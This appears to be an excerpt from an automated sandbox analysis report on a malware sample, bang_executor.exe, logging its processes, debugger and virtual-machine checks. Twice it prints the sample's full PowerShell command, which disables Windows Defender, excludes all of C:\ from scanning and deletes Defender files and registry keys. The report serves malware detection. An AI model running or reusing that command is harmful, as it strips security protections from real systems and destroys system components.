          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeMemory allocated: 23077560000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeMemory allocated: 23078F80000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeMemory allocated: EF0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeMemory allocated: 1ACA0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeMemory allocated: 23B86490000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeMemory allocated: 23B9FE50000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeMemory allocated: 1350BDE0000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeMemory allocated: 13525660000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeMemory allocated: 21D60FF0000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeMemory allocated: 21D7AAB0000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3105
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5600
          Source: C:\Users\user\Desktop\bang_executor.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-24534
          Source: C:\Users\user\Desktop\bang_executor.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-25719
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe TID: 7592Thread sleep count: 143 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe TID: 7584Thread sleep count: 133 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe TID: 7324Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe TID: 7748Thread sleep count: 206 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe TID: 7748Thread sleep count: 183 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800Thread sleep count: 3105 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800Thread sleep count: 5600 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7988Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe TID: 7440Thread sleep count: 74 > 30
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe TID: 7440Thread sleep count: 275 > 30
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe TID: 8148Thread sleep count: 283 > 30
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe TID: 8148Thread sleep count: 115 > 30
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\bang_executor.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004EC4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_004EC4A8
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004FE560 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_004FE560
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_00500B80 VirtualQuery,GetSystemInfo,0_2_00500B80
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: Amcache.hve.25.drBinary or memory string: VMware
          Source: Amcache.hve.25.drBinary or memory string: VMware Virtual USB Mouse
          Source: Amcache.hve.25.drBinary or memory string: vmci.syshbin
          Source: Amcache.hve.25.drBinary or memory string: VMware, Inc.
          Source: Amcache.hve.25.drBinary or memory string: VMware20,1hbin@
          Source: Amcache.hve.25.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.25.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.25.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: bang_executor.exe, 00000000.00000002.1635605168.0000000005014000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: Amcache.hve.25.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.25.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: Amcache.hve.25.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.25.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: bang_executor.exe, 00000020.00000002.1821708093.0000021D60EEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: bang_executor.exe, 0000001C.00000002.1779420733.000001350BCD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll99
          Source: bang_executor.exe, 00000003.00000002.1777736692.00000230774AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMM
          Source: Amcache.hve.25.drBinary or memory string: vmci.sys
          Source: Amcache.hve.25.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
          Source: bang_executor.exe, 00000000.00000002.1635605168.0000000005014000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Amcache.hve.25.drBinary or memory string: vmci.syshbin`
          Source: Amcache.hve.25.drBinary or memory string: \driver\vmci,\driver\pci
          Source: Amcache.hve.25.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.25.drBinary or memory string: VMware20,1
          Source: Amcache.hve.25.drBinary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.25.drBinary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.25.drBinary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Amcache.hve.25.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: Amcache.hve.25.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.25.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.25.drBinary or memory string: VMware PCI VMCI Bus Device
          Source: Amcache.hve.25.drBinary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.25.drBinary or memory string: VMware Virtual RAM
          Source: Amcache.hve.25.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: bang_executor.exe, 00000013.00000002.1765725139.0000023B86327000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\\
          Source: Amcache.hve.25.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: C:\Users\user\Desktop\bang_executor.exeAPI call chain: ExitProcess graph end nodegraph_0-24694
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_0050647F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0050647F
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_0050A640 mov eax, dword ptr fs:[00000030h]0_2_0050A640
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_0050E680 GetProcessHeap,0_2_0050E680
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_0050215D SetUnhandledExceptionFilter,0_2_0050215D
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_005012D7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_005012D7
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_0050647F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0050647F
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_00501FCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00501FCA
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name 